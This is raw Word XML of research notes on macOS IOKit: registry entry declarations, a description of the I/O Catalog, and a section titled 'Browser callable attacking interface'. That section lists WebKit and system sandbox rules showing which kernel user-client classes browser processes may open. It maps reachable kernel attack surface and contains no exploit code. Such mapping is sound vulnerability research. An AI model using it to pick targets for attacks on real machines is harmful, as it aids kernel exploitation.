        <w:t>    @discussion The entry ID returned by getRegistryEntryID can be used to identify a registry entry across all tasks. A registry entry may be looked up by its entry ID by creating a matching dictionary with IORegistryEntryIDMatching() in user space, or &lt;code&gt;IOService::registryEntryIDMatching()&lt;/code&gt; in the kernel, to be used with the IOKit matching functions. The ID is valid only until the machine reboots.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result An ID for the registry entry, assigned when the entry is first attached in the registry.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uint64_t</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getRegistryEntryID</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 * * * * * * * * * * * * * * * * * * * * * * * * * * */</w:t>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 * * * * * * * * * * internals * * * * * * * * * * * */</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* * * * * * * * * * * * * * * * * * * * * * * * * * * * */</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irtual</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ini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from</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n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ifdef</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>XNU_KERNEL_PRIVATE</w:t>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ublic</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else</w:t>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rivate</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b/>
          <w:bCs/>
          <w:color w:val="008000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#endif</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static</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nitializ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color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>privat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inline</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arrayMember</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SArra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se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member</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ndex</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bool</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>makeLink</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to</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sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>relation</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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>breakLink</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to</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unsigned</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sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>relation</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APPLE_KEXT_COMPATIBILITY_VIRTUAL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OSArra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ParentSetReferenc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APPLE_KEXT_COMPATIBILITY_VIRTUAL</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lastRenderedPageBreak/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OSArra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ChildSetReference</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APPLE_KEXT_COMPATIBILITY_VIRTUAL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IORegistryEntry</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getChildFromComponent</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ath</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APPLE_KEXT_COMPATIBILITY_VIRTUAL</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OSSymbol</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hasAlias</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opa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int</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length</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color w:val="008080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</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t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>APPLE_KEXT_COMPATIBILITY_VIRTUAL</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matchPathLocation</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b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>char</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cmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>                </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IORegistry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t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plane</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008446B5" w:rsidRPr="006D0E0F" w:rsidRDefault="008446B5" w:rsidP="008446B5"/>
    <w:p w:rsidR="008446B5" w:rsidRDefault="00BA1068" w:rsidP="008446B5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r w:rsidR="008446B5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Catalog</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008446B5" w:rsidRDefault="008446B5" w:rsidP="008446B5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxxxx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002151C5" w:rsidRPr="00A43021" w:rsidRDefault="002151C5" w:rsidP="002151C5"/>
    <w:p w:rsidR="002151C5" w:rsidRDefault="008446B5" w:rsidP="002151C5">
      <w:r>
        <w:t xml:space="preserve">Whereas the I/O Registry maintains the collection of objects active in the running system, the I/O Catalog maintains the collection of available driversit is an in-kernel dynamic database containing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="docemphasis"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I/O Kit driver personalities. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
        </w:rPr>
        <w:t>IOService</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> class uses this resource when matching devices to their associated drivers. In particular, on discovering a device, a nub consults the I/O Catalog to retrieve the list of all drivers belonging to the device's family. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
        </w:rPr>
        <w:t>IOCatalogue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> class provides methods for initializing the catalog, adding drivers, removing drivers, finding drivers based on caller-provided information, and so on.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002151C5" w:rsidRDefault="00321BA4" w:rsidP="002151C5">
      <w:r>
        <w:t xml:space="preserve">During bootstrapping, the I/O Catalog is initialized from a list of built-in catalog entries. The list is represented by the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
        </w:rPr>
        <w:t>gIOKernelConfigTables</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> string [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
        </w:rPr>
        <w:t>iokit/KernelConfigTables.cpp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">], which holds the built-in drivers' serialized information. </w:t>
      </w:r>
      <w:hyperlink r:id="rId111" w:anchor="ch10table01" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Table 101</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> shows the members of the list. Much of the I/O Catalog's functionality is implemented in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
        </w:rPr>
        <w:t>libsa/catalogue.cpp</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F1F18" w:rsidRDefault="008F1F18" w:rsidP="008F1F18">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F1F18" w:rsidRDefault="008F1F18" w:rsidP="008F1F18">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxxxx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002151C5" w:rsidRDefault="002151C5" w:rsidP="002151C5"/>
    <w:p w:rsidR="00CC5D54" w:rsidRDefault="004106D2" w:rsidP="002151C5">
      <w:hyperlink r:id="rId112" w:history="1">
        <w:r w:rsidR="00CC5D54" w:rsidRPr="00D8265B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://developer.apple.com/library/mac/documentation/DeviceDrivers/Conceptual/AccessingHardware/AH_IOKitLib_API/AH_IOKitLib_API.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00CC5D54" w:rsidRDefault="00CC5D54" w:rsidP="002151C5"/>
    <w:p w:rsidR="002151C5" w:rsidRDefault="002151C5" w:rsidP="002151C5"/>
    <w:p w:rsidR="00EB01A5" w:rsidRDefault="00EB01A5" w:rsidP="00EB01A5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Browser callable attacking interface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB01A5" w:rsidRDefault="00EB01A5" w:rsidP="00EB01A5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IOKit </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB01A5" w:rsidRDefault="00EB01A5" w:rsidP="00EB01A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*.sb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A148A" w:rsidRPr="00AA3893" w:rsidRDefault="008A148A" w:rsidP="008A148A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A148A">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>/System/Library/Frameworks/WebKit.framework/Versions/A/Re</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>sources/com.apple.WebProcess.sb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>;; IOKit user clients</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>(allow iokit-open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">       (iokit-user-client-class "AppleUpstreamUserClient")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">       (iokit-user-client-class "IOHIDParamUserClient")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">       (iokit-user-client-class "RootDomainUserClient")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">       (iokit-user-client-class "IOAudioControlUserClient")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">       (iokit-user-client-class "IOAudioEngineUserClient"))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB01A5" w:rsidRDefault="008A148A" w:rsidP="008A148A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A148A">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>/System/Library/Sandbox/Profiles/system.sb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>;; OpenCL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">  (allow iokit-open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">         (iokit-connection "IOAccelerator")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">         (iokit-user-client-class "IOAccelerationUserClient")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">         (iokit-user-client-class "IOSurfaceRootUserClient")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">         (iokit-user-client-class "IOSurfaceSendRight"))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">  ;; CoreVideo CVCGDisplayLink</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">  (allow iokit-open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">         (iokit-user-client-class "IOFramebufferSharedUserClient"))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  ;; H.264 Acceleration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">  (allow iokit-open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">         (iokit-user-client-class "AppleSNBFBUserClient"))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">  ;; QuartzCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">  (allow iokit-open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">         (iokit-user-client-class "AGPMClient")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">         (iokit-user-client-class "AppleGraphicsControlClient")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">         (iokit-user-client-class "AppleGraphicsPolicyClient"))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">  ;; OpenGL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
